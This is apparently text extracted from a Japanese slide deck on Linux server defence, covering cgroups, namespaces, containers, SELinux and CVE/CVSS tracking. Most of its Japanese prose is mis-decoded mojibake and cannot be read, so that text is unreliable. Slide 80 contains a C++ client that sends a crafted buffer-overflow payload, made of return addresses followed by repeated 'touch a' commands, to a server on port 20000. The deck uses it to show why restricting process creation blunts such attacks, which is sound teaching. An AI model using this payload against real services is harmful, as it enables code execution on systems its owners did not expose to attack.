79. PIDs cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺Ͱ ࡞੒Ͱ͖Δϓϩηεͷ࠷େ਺Λ੍ݶ͢Δ ϓϩηε /bin/ls execl("/bin/ls","/bin/ls",nullptr ); ىಈ άϧʔϓ಺ͷϓϩηε਺͕࠷େʹୡ͍ͯ͠Δҝ

    ࢠϓϩηεͷੜ੒Λڋ൱

80. tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); const std::vector<

    uint8_t > command{ 't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00, 0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00, 0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00 }; for( size_t i = 0u; i != 10u; ++i ) std::copy( command.begin(), command.end(), std::back_inserter( data ) ); data.push_back( 0x0d ); ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ system() γΣϧεΫϦϓτ ߈ܸऀ͕όοϑΝΦʔόʔϥϯ͔Β ೚ҙͷॲཧͷ࣮ߦʹܨ͛Δ࠷΋खܰͳํ๏system()͸ தͰࢠϓϩηεΛੜ੒͍ͯ͠Δҝ ࢠϓϩηε͕ੜ੒ग़དྷͳ͍ͱ߈ܸ͕େม໘౗ʹͳΔ

81. $ g++ sample.c -o sample $ ./sample bin dev home

    lib32 lost+found mnt proc run sys usr boot etc lib lib64 media opt root sbin tmp var ੒ޭ $ cgcreate -g pids:test $ cgset -r pids.max=1 test $ cgexec -g pids:test ./sample ࣦഊ $ #include <iostream> #include <cstdlib> int main() { if( system( "ls /" ) == 0 ) std::cout << "੒ޭ" << std::endl; else std::cout << "ࣦഊ" << std::endl; } system()͕ػೳ͢ΔͱϧʔτσΟϨΫτϦͷ಺༰Λදࣔ͢ΔϓϩάϥϜ ͬ͢ͽΜͰಈ͔͢ͱදࣔ͞ΕΔ testͱ͍͏໊લͷpidsʹؔ͢Δ৽͍͠cgroupΛ࡞Δ test಺ͷ࠷େϓϩηε਺Λ1ʹ͢Δ cgroupΛtestʹͯ͠ಈ͔͢ͱ system()ʹࣦഊ͢Δ

82. ͨͩ͜͠ͷ੍ݶΛ͔͚Δͱ αʔόͷຊདྷͷ༻్Ͱ΋ࢠϓϩηε͕࡞Εͳ͘ͳΔ ͜ͷख͕࢖͑Δͷ͸ ໌Β͔ʹࢠϓϩηεΛඞཁͱ͠ͳ͍αʔϏεʹݶΒΕΔ

83. devices cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ αʔό γΣϧ ىಈ ࠓ߈ܸऀ͸ҰൠϢʔβͰͷγΣϧͷىಈʹ੒ޭ͠ α΢ϯυσόΠεͷ੬ऑੑΛಥ͍ͯ rootΛऔΖ͏ͱ͍ͯ͠Δ

    CVE-2017-15265 ߈ܸऀ ੬ऑͳ Linux

84. devices cgroups ࢦఆͨ͠ϓϩηεάϧʔϓ಺͔Β ৮ͬͯྑ͍σόΠεΛ੍ݶ͢Δ αʔό γΣϧ ىಈ CVE-2017-15265 ߈ܸऀ ͜ͷάϧʔϓʹ͸α΢ϯυσόΠε͸͍Βͳ͍ഺͳͷͰ

    α΢ϯυσόΠεΛ৮ͬͯ͸͍͚ͳ͍ ੬ऑͳ Linux ͜͏͍͏੍ݶΛ͋Β͔͡Ί͔͚Δࣄ͕Ͱ͖Δ

85. ໊લۭؒ ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηε͔Β Կ͕ݟ͑Δ͔Λ੍ݶ͢Δ init!"!5*[agetty] #!busybox #!login!!!bash!!!top #!sshd!"!sshd!!!sshd!!!bash!!!pstree $ %!sshd!!!sshd!!!bash!!!vim %!udevd

    ྫ: ͜ͷൣғͷϓϩηεʹ͸ ֎ͷϓϩηε͕ݟ͑ͳ͍ (PID໊લۭؒ) bash!!!vim ͜ͷ໊લۭؒʹͱͬͯͷPID1 ຊ౰ͷPID1

86. Ϛ΢ϯτ໊લۭؒ Ͳ͜ʹԿ͕Ϛ΢ϯτ͞Ε͍ͯΔ͔ͷ৘ใΛ ਌ϓϩηε͔Β෼཭͢Δ ਌ϓϩηε ࢠϓϩηε IPHF GVHB IPHF GVHB ਌ϓϩηε͔Βݟ͑Δ/hoge/fuga

    ࢠϓϩηε͔Βݟ͑Δ/hoge/fuga chroot΍umountͱ૊Έ߹ΘͤΔࣄͰ ࢠϓϩηε͔Β਌ϓϩηεͷσΟϨΫτϦπϦʔͷଘࡏΛ ݟ͑ͳ͘͢Δࣄ͕Ͱ͖Δ

87. Ϛ΢ϯτ໊લۭؒ IPHF GVHB ߈ܸʹ࢖͑ͦ͏ͳ΋Μ͕ ͳΜ΋ͳ͍… αʔόΛಈ͔͢ͷʹඞཁͳ࠷খݶͷϑΝΠϧ͚͕ͩݟ͑Δ σΟϨΫτϦπϦʔΛ/ͱͯ͠αʔόΛಈ͔͢ࣄͰ ߈ܸऀͷબ୒ࢶΛڱΊΔࣄ͕Ͱ͖Δ ߈ܸऀ

88. UID໊લۭؒ ಛఆͷ໊લۭؒʹଐ͢ϓϩηεͷΈʹ ௨༻͢ΔrootΛ࡞Γग़͢ ߈ܸऀ Զ͸ࠓ͔Β rootͩ!

89. UID໊લۭؒ ಛఆͷ໊લۭؒʹଐ͢ϓϩηεʹͷΈ ௨༻͢ΔrootΛ࡞Γग़͢ ߈ܸऀ rootͷ໋ྩͩͧ! ͋ͳͨ͸ͦͷ◦ͷதͰͷΈ rootͳͷͰμϝͰ͢

90. ໊લۭؒ ͜ͷଞʹ΋ ωοτϫʔΫͷઃఆ cgroupͷઃఆ ઀ଓͰ͖Δϓϩηεؒ௨৴ ։͍͍ͯΔϑΝΠϧσΟεΫϦϓλ ͳͲ৭Μͳ΋ͷΛ ਌ϓϩηεͱࢠϓϩηεͰผʹ͢Δࣄ͕Ͱ͖Δ

91. طʹ ؾ͍͍ͮͯΔ͔΋͠Εͳ͍͕

92. cgroupͱ໊લۭؒΛ׆༻ͯ͠ ਌ϓϩηεͱࢠϓϩηεʹݟ͑Δ෺ Ͱ͖ΔࣄΛ׬શʹ෼཭ͨ͠ͷ͕ LinuxͷίϯςφͰ͋Δ

93. ਌ϓϩηεͱࢠϓϩηεͷ׬શͳ෼཭ͷઃఆΛ ؆୯ʹͰ͖ΔΑ͏ʹ͍ͯ͠Δͷ͕ ྲྀߦΓͷDockerͰ͋Δ https://www.docker.com/

94. ίϯςφͱϚΠΫϩαʔϏε cgroupͱ໊લۭؒ͸ϓϩηε୯ҐͰઃఆ͞ΕΔ 1ͭͷڊେͳϓϩηεͰ αʔϏεΛఏڙ͢ΔΑΓ ୯७ͳػೳΛఏڙ͢ΔαʔόΛ ωοτϫʔΫͰܨ͍Ͱ େ͖ͳαʔϏεΛ࡞Δํ͕ ݸʑͷϓϩηεʹ༩͑Δ ݖݶΛΑΓখ͘͢͞Δࣄ͕Ͱ͖Δ

95. ίϯςφͱϚΠΫϩαʔϏε ͜ͷΑ͏ͳߏ੒ʹͯ͋͠Δͱ ϓϩηεͷ͏ͪͷ1͕ͭ Ծʹ߈ܸऀͷखʹམͪͨͱͯ͠΋ ͦͷ࣌఺ͰͷӨڹΛ αʔϏε಺ͷݶΒΕͨྖҬʹ ͱͲΊΒΕΔ

96. ͨͩ͠ ͨ·ʹcgroupͱ໊લۭؒࣗମͷෆ۩߹Ͱ ߈ܸऀ͕ίϯςφͷ֎ʹ୤ग़Ͱ͖ͯ͠·͏ ੬ऑੑ͕ݟ͔ͭΔࣄ͕͋ΔͷͰ஫ҙ ྫ
    $7&

97. SELinuxΛ׆༻ͤΑ

98. ॴ༗ऀ: Bob άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ॴ༗ऀͱ άϧʔϓϝϯόʔ͸ ಡΈॻ͖OK ݹయతͳ*NIXͷύʔϛογϣϯ ΧϨʔ԰৘ใ

    Alice (ΧϨʔಉ޷ձձһ) "MJDF͞Μ͸άϧʔϓϝϯόʔ
    άϧʔϓϝϯόʔͷॻ͖ࠐΈ͸0, Linux OK ͋ͷϑΝΠϧʹ ॻ͖͍ͨ

99. ͜ͷΑ͏ʹϢʔβ͕ࣗ෼Ͱ ৘ใΛʹΞΫηε͢ΔͨΊʹඞཁͳݖݶΛઃఆ͢Δ ΞΫηε੍ޚΛ ೚ҙΞΫηε੍ޚ ͱݺͿ

100. ॴ༗ऀ: Bob άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ॴ༗ऀͱ άϧʔϓϝϯόʔ͸ ಡΈॻ͖OK ΧϨʔ԰৘ใ BobΛࣗশ͢Δ

     ߈ܸऀ #PC͞Μ͸
     ϑΝΠϧͷॴ༗ऀ͔ͩΒ
     #PC͞ΜͷཁٻͳΒؒҧ͍ͳ͍ Linux ͋ͷϑΝΠϧΛ ࣺͯͨ͘ͳͬͨ OK ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

101. ॴ༗ऀ: Charlie άϧʔϓ: ΧϨʔಉ޷ձ ύʔϛογϣϯ: ୭Ͱ΋ಡΈॻ͖ࣗ༝ ۃൿ৘ใ Charlie $IBSMJF͞Μ͸
     ϑΝΠϧͷॴ༗ऀ͔ͩΒ
     

     $IBSMJF͞ΜͷཁٻͳΒؒҧ͍ͳ͍ Linux OK *NIXΑʔΘ͔ΒΜ 777ʹ͠ͱ͍ͯ ݹయతͳ*NIXͷύʔϛογϣϯͷݶք

102. γεςϜ؅ཧऀ͕γεςϜશମʹ ηΩϡϦςΟཁ݅Λڧ੍͢Δ ڧ੍ΞΫηε੍ޚ ͕ཁΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ Charlie͕ͲΜͳʹζϘϥͰ΋ γεςϜશମͷηΩϡϦςΟ͸อͨΕΔඞཁ͕͋Δ

103. ୭͔ͩΒʙ͕Ͱ͖Δ ͱ͍͏ܗҎ֎ͷํ๏ʹΑΔΞΫηε੍ޚ͕ཁΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ BobຊਓͱBobʹͳΓ͢·͢߈ܸऀΛ۠ผ͢Δʹ͸ ୭͔͸࢖͍෺ʹͳΒͳ͍

104. શͯͷϓϩηεʹ͸਌ࢠؔ܎͕͋Δ ͋Δ೔ͷBob͞Μͷϓϩηε Bob ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏ ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ

105. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ Bob BobʹͳΓ͢·ͨ͠ ߈ܸऀ ϓϩηε͕߈ܸऀͷखʹམͪΔͱ ͜͏͍͏ঢ়ଶʹͳΔ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

106. ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ Ոͷ૟আΛ͢Δ ϓϩηεʹυϝΠϯΛ͚ͭΑ͏ υϝΠϯ͸͋Β͔͡Ί༻ҙ͞Εͨϧʔϧʹैͬͯ෇༩͞Ε ࢠϓϩηεʹҾ͖ܧ͕Ε SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍ Bob ૟আத ૟আத ͜Ε

     ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

107. ૟আத ʹΞΫηεͯ͠ྑ͍΋ͷ Ϧιʔεʹ΋υϝΠϯ(λΠϓ)Λ͚ͭΑ͏ SELinuxࣗମͷઃఆݖݶΛ࣋ͨͳ͍Ϣʔβ͸มߋ͸Ͱ͖ͳ͍ ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

108. ίϯϏχʹߦ్͘தͰѱ͍ਓʹั·ΓೖΕସΘΔ ΧϨʔಉ޷ձͷϊʔτʹམॻ͖Λ͢Δ Ոͷ૟আΛ͢Δ Bob ΰϛା͕੾Ε͍͔ͯͨΒίϯϏχʹങ͍ʹߦ͘ BobʹͳΓ͢·ͨ͠ ߈ܸऀ ͢Δͱ߈ܸऀͷϓϩηε͸͜͏ͳΔ ૟আத ૟আத

     ૟আத ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

109. Linux ͳΜ͚ͩͲ ΧϨʔಉ޷ձͷϊʔτʹॻ͖ࠐΈͤͯ͞ ૟আ͍ͤ υϝΠϯͷෆҰகΛཧ༝ʹ ৘ใ΁ͷΞΫηεΛڋ൱Ͱ͖Δ BobʹͳΓ͢·ͨ͠ ߈ܸऀ ૟আத ݹయతͳ*NIXͷύʔϛογϣϯΛิ͏

110. ॏཁͳϙΠϯτ ୭͔ͩΒڐՄ͢Δ Ͱ͸ͳ͘ ԿΛ͍ͯ͠Δ࠷த͔ͩΒڐՄ͢Δ ʹͳ͍ͬͯΔ

111. Æ SELinux ύʔϛογϣϯ system_u:object_r: passwd_exec_t Bob ॴ༗ऀ: Bob ॴ༗ऀͷಡΈॻ͖OK ಡΜͰOK

     㲔 SELinux passwd_exec_t ͸ಡΜͰྑ͍ ಡΜͰOK ૯ධ ಡΜͰOK ͋ͷϑΝΠϧ ݟͤͯ #PC͞Μ͕ࣗ෼Ͱ
     ઃఆͰ͖Δൣғ SELinux passwd_exec_t ͸࢖ͬͯ͸͍͚ͳ͍ ࢖༻ېࢭ ૯ධ ࢖༻ېࢭ 8080 8080൪ϙʔτΛ ࢖͍͍ͨͳ

112. $ sesearch --allow … allow passwd_t crack_db_t:dir { getattr ioctl

     lock open read search }; allow passwd_t crack_db_t:file { getattr ioctl lock open read }; allow passwd_t default_context_t:dir { getattr open search }; allow passwd_t device_t:dir { getattr ioctl lock open read search }; … allow passwd_t shadow_t:file { append create getattr ioctl link lock open read relabelfrom relabelto rename setattr unlink write }; … allow passwd_t passwd_exec_t:file { entrypoint execute getattr ioctl lock map open read }; … allow user_t passwd_exec_t:file { execute getattr open read }; allow user_t passwd_t:process transition; … ҰൠϢʔβ͕ී௨ʹϩάΠϯ͖ͯͨ͠ঢ়گ͔Β
     passwd_exec_tʹଐ͢ίϚϯυΛ࣮ߦ͢Δࣄ͕Ͱ͖Δ
     passwd_tυϝΠϯ΁ͷભҠ͕ೝΊΒΕΔ passwd_exec_tʹ
     ଐ͢ίϚϯυͷ࣮ߦ࣌ʹ
     passwd_tʹભҠ͢Δ passwd_tυϝΠϯͰ͸passwdΛ࣮ߦ͢Δͷʹඞཁͳ΋ͷ͔͠৮Εͳ͍ passwd_tͷϓϩηε͸ shadow_tλΠϓͷ ύεϫʔυϑΝΠϧΛ৮ΕΔ

113. passwd ύεϫʔυϑΝΠϧ ਖ਼نͷϩάΠϯखॱͰ
     ೖ͖ͬͯͨϢʔβ ύεϫʔυͱ ؔ܎ͳ͍ ϑΝΠϧ shadow_t΁ͷΞΫηεݖ͕ͳ͍ ແؔ܎ͳϑΝΠϧ΁ͷ
     ΞΫηεݖ͕ͳ͍

     passwd_tʹભҠ Bob ਖ਼نͷϩάΠϯखॱͰ
     ೖͬͯ͜ͳ͔ͬͨϢʔβ passwd_tʹ ભҠ͢Δݖݶ͕ͳ͍ shadow_t΁ͷ ΞΫηεݖ͕ͳ͍ BobʹͳΓ͢·͢߈ܸऀ passwd_t͸shadow_tΛ৮ΕΔ

114. SELinuxͷઃఆΛద੾ʹߦ͏ࣄͰ ߈ܸऀ͕ϓϩηεΛ৐ͬऔͬͨͱͯ͠΋ ͦͷӨڹΛ ͔ͦ͜ΒભҠͰ͖ΔυϝΠϯ͚ͩʹ ݶఆͰ͖Δ

115. SELinux͕ΞΫηεΛڋ൱͢Δͱ ҎԼͷΑ͏ͳΧʔωϧϩά͕ग़Δ audit: type=1400 audit(1521959710.081:83): avc: denied { setattr }

     for pid=2168 comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file passwd_tҎ֎ͷυϝΠϯͰ࣮ߦ͞Εͨ ίϚϯυchmod͕ shadow_tλΠϓ͕͍ͭͨϑΝΠϧshadowͷ ύʔϛογϣϯΛॻ͖׵͑Α͏ͱͨ͠ҝ ڋ൱ͨ͠

116. audit: type=1400 audit(1521959710.081:83): avc: denied { setattr } for pid=2168

     comm="chmod" name="shadow" dev="vda" ino=524679 scontext=staff_u:staff_r:staff_t tcontext=system_u:object_r:shadow_t tclass=file ιϑτ΢ΣΞʹ͜ͷૢ࡞Λ͢΂͖ਖ਼౰ͳཧ༝͕͋Δ৔߹ ͦͷιϑτ΢ΣΞͷҝͷ৽͍͠υϝΠϯΛ࡞Ζ͏ ͦͷιϑτ΢ΣΞ͕ਖ਼ৗʹ࢖ΘΕΔͱ͖ʹ ͦͷυϝΠϯʹભҠͰ͖ΔݖݶΛ༩͑Α͏ ͦͷυϝΠϯʹඞཁͳૢ࡞Λߦ͏ݖݶΛ༩͑Α͏

117. ࣮ࡍͷSELinuxͷઃఆखॱ͸௕͘ͳΔͷͰׂѪ ίϚϯυ΍ઃఆϑΝΠϧͷ࢖͍ํ͸ RedHatͷυΩϡϝϯτʹΑ͘·ͱ·͍ͬͯΔ https://access.redhat.com/documentation/ja-jp/red_hat_enterprise_linux/7/html/ selinux_users_and_administrators_guide/ ͜͜ʹ
     3FE)BUͷ4&-JOVYϢʔβʔͱ؅ཧऀͷΨΠυΛషΔ

118. RedHatҎ֎ͷσΟετϦϏϡʔγϣϯΛ࢖͏৔߹ γεςϜͷϢʔβ΍λΠϓ໊ɺͦͷݖݶͷൣғ͕ ҟͳ͍ͬͯΔՄೳੑ͕͋Δ ࢖༻͢ΔσΟετϦϏϡʔγϣϯʹ SELinuxʹؔ͢Δઆ໌͕͋Δ৔߹͸ ͦͪΒ΋ࢀর͢΂͠

119. ੬ऑੑ৘ใͷ௥͍ํ

120. αʔό্Ͱಈ͍͍ͯΔͷ͕
     ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ͚ͩ
     ͱ͍͏έʔε͸كͰ͋Δ ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ

     ศརͳ ϥΠϒϥϦ Χʔωϧ(OS) υϥΠό υϥΠό ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ ศརͳϥΠϒϥϦ

121. ࣗ෼Ͱ࡞͍ͬͯͳ͍෦෼Ͱ੬ऑੑ͕ݟ͔ͭͬͯ
     ࣗ෼ͷιϑτ΢ΣΞ͕҆શͰͳ͘ͳΔ͜ͱ͸Α͋͘Δ ࣗ෼Ͱ࡞ͬͨιϑτ΢ΣΞ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ ϥΠϒϥϦ ศརͳ

     ϥΠϒϥϦ Χʔωϧ υϥΠό υϥΠό ϋʔυ΢ΣΞ ϋʔυ΢ΣΞ ศརͳϥΠϒϥϦ

122. ར༻͍ͯ͠Δ Αͦͷιϑτ΢ΣΞͷ ੬ऑੑ৘ใΛؾʹ͔͚Α͏

123. Common Vulnerabilities and Exposures ڞ௨੬ऑੑࣝผࢠ ུͯ͠$7& ੈքதͰݟ͔ͭͬͨ੬ऑੑʹ
     Ұҙͳ*%ΛׂΓ౰ͯͯσʔλϕʔεԽ͍ͯ͠Δ http://www.cve.mitre.org/ ͜͜ʹ
     

     $7&ͷ8FCαΠτͷτοϓϖʔδΛషΔ

124. Common Vulnerabilities and Exposures BQBDIFͰݕࡧΛ͔͚ͯΈͨͱ͜Ζ http://www.cve.mitre.org/cve/search_cve_list.html ͜͜ʹ
     $7&ͷ8FCαΠτͰBQBDIFͰݕࡧΛ͔͚ͨͱ͜ΖΛషΔ

125. ͜͜ʹ
     $7&ͷ/*45ʹΑΔղઆΛషΔ Common Vulnerabilities and Exposures "QBDIF
     IUUQEͷIUBDDFTTʹ-JNJUΛઃఆ͍ͯ͠Δ৔߹ʹ
     ϦϞʔτ͔Βݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏Մೳੑ͕͋Δ੬ऑੑ 6TFBGUFSGSFF੬ऑੑͰ͋Γ
     ඞͣ͠΋ݟ͑ͯ͸͍͚ͳ͍৘ใ͕ૹΒΕΔ༁Ͱ͸ͳ͍

     https://nvd.nist.gov/vuln/detail/CVE-2017-9798

126. Common Vulnerability Scoring System https://nvd.nist.gov/vuln/detail/CVE-2017-9798 ڞ௨੬ऑੑධՁγεςϜ(ུͯ͠CVSS) ੬ऑੑͷϠό͞Λ਺஋ʹͨ͠΋ͷ ͜ΕΛݟΕ͹੬ऑੑͷ࢓૊Έ͕Θ͔Βͳͯ͘΋
     Ͳͷ͘Β͍·͍ͣࣄʹͳ͍ͬͯΔ͔͕Θ͔Δ ͜͜ʹ
     

     $7&ͷ$744ΛషΔ

127. Common Vulnerability Scoring System جຊධՁج४
     (Base Metrics) ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
     ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ ݱঢ়ධՁج४ (Temporal

     Metrics) ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
     ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ ؀ڥධՁج४
     (Environmental Metrics) ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
     ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ

128. Common Vulnerability Scoring System جຊධՁج४
     (Base Metrics) ੬ऑੑͦͷ΋ͷͷಛ௃ʹجͮ͘είΞ
     ͜͜ͷ஋͕ߴ͍ఔର৅ʹେ͕݀։͍͍ͯΔ ݱঢ়ධՁج४ (Temporal

     Metrics) ੬ऑੑʹର͢ΔରԠঢ়گʹجͮ͘είΞ
     ͜ͷ஋͸ঢ়گͷมԽʹԠͯ͡มΘΔ ؀ڥධՁج४
     (Environmental Metrics) ੬ऑੑ͕ར༻͞Εͨ৔߹ͷӨڹͷେ͖͞ʹجͮ͘είΞ
     ͜ͷ஋͸ର৅͕ར༻͞Ε͍ͯΔ؀ڥʹΑͬͯมΘΔ ͜͜ʹ
     $7&ͷ$744ΛషΔ ࣌ͱ৔ॴʹґΒͳ͍جຊධՁج४ͷείΞ͕
     ੬ऑੑ৘ใͱͯ͠ެ։͞Ε͍ͯΔ

129. جຊධՁج४ (Base Metrics) ߈ܸݩ۠෼
     (Access Vector) ߈ܸऀ͸Ͳ͔͜Β߈ܸΛߦ͏ඞཁ͕͋Δ͔
     ϩʔΧϧ ಉҰηάϝϯτ ωοτϫʔΫͷͲ͔͜ΒͰ΋ ߈ܸ৚݅ͷෳࡶ͞
     (Access

     Complexity) ߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͸೉͍͔͠
     ಛผͳઃఆ͕࢖ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ஌͍ͬͯΔඞཁ͕͋Δ ඞཁͳಛݖϨϕϧ
     (Privileges Required) ߈ܸΛߦ͏ʹ͸Ͳͷఔ౓ͷݖݶ͕ඞཁ͔
     ҰൠϢʔβݖݶ͕ඞཁ ؅ཧऀݖݶ͕ඞཁ

130. جຊධՁج४ (Base Metrics) Ϣʔβؔ༩Ϩϕϧ
     (User Interaction) ߈ܸΛ੒ཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔
     ࡉ޻Λͨ͠8FCϖʔδΛ։͔ͤΔඞཁ͕͋Δ είʔϓ
     (Scope) ߈ܸΛड͚ͨίϯϙʔωϯτҎ֎΁ͷ߈ܸͷ଍͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔
     ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘౰͢Δ

131. جຊධՁج४ (Base Metrics) ׬શੑ΁ͷӨڹ
     (Integrity Impact) ߈ܸऀ͸ର৅ͷ৘ใΛվ᜵Ͱ͖Δ͔
     վ᜵Ͱ͖Δ৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ Մ༻ੑ΁ͷӨڹ
     (Availability Impact) ߈ܸऀ͸αʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
     

     Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ
     ׬શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ػີੑ΁ͷӨڹ
     (Confidentiality Impact) ߈ܸऀʹݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏͔
     ݟ͑ͯ͠·͏৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

132. ͜͜ʹ
     $7&ͷ$744ΛషΔ Apach httpdͷ੬ऑੑCVE-2017-9798ͷ৔߹ ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ ߈ܸ͸؆୯ ߈ܸʹݖݶ͸ಛʹඞཁͳ͠ ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ػີ৘ใ͕࿙ΕΔ

     ৘ใͷվ͟Μ͸Ͱ͖ͳ͍ Մ༻ੑΛଛͶΔ͜ͱ͸Ͱ͖ͳ͍ ۓٸ౓: 7.5/10.0 (ߴ) ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏ https://nvd.nist.gov/vuln/detail/CVE-2017-9798

133. ͜͜ʹ
     $7&ͷ$744ΛషΔ BINDͷ੬ऑੑCVE-2016-2776ͷ৔߹ ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ ߈ܸ͸؆୯ ߈ܸʹݖݶ͸ಛʹඞཁͳ͠ ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ৘ใ͸࿙Εͳ͍ ৘ใͷվ͟Μ͸Ͱ͖ͳ͍

     Մ༻ੑΛ׬શʹଛͶΔࣄ͕Ͱ͖Δ ۓٸ౓: 7.5/10.0 (ߴ) ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏ https://nvd.nist.gov/vuln/detail/CVE-2016-2776

134. ͜͜ʹ
     $7&ͷ$744ΛషΔ Firefoxͷ੬ऑੑCVE-2016-5253ͷ৔߹ ϩʔΧϧ͔Β߈ܸͰ͖Δ ߈ܸ͸؆୯Ͱ͸ͳ͍ ҰൠϢʔβݖݶ͕ཁΔ ϢʔβʹԿ͔ͤ͞Δඞཁ͸ͳ͠ Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍ ৘ใ͸࿙Εͳ͍ ػີ৘ใͷվ͟Μ͕Ͱ͖Δ

     Մ༻ੑΛଛͶΔࣄ͸Ͱ͖ͳ͍ ۓٸ౓: 4.7/10.0 (த) ੬ऑੑʹ͸ҧ͍ͳ͍͚ͲϠό͍΍ͭͰ͸ͳͦ͞͏ https://nvd.nist.gov/vuln/detail/CVE-2016-5253

135. ͜͜ʹ
     SFEIBUͷ੬ऑੑ৘ใͷϖʔδΛషΔ ۓٸ౓ͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β Ͳ͏͢Ε͹࠹͛Δ͔ʹؔ͢Δ৘ใ͕ग़Δ https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776 ͜͜ʹ
     EFCJBOͷ੬ऑੑ৘ใͷϖʔδΛషΔ

136. ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏ ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ CVSSΛݟͯӨڹΛධՁ͠Α͏ σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍ ੬ऑੑͷৄࡉΛݟͯ ໰୊ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏ σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ ૣٸʹΞοϓσʔτ͠Α͏

137. ௨৴ʹର͢Δ߈ܸʹඋ͑Δ

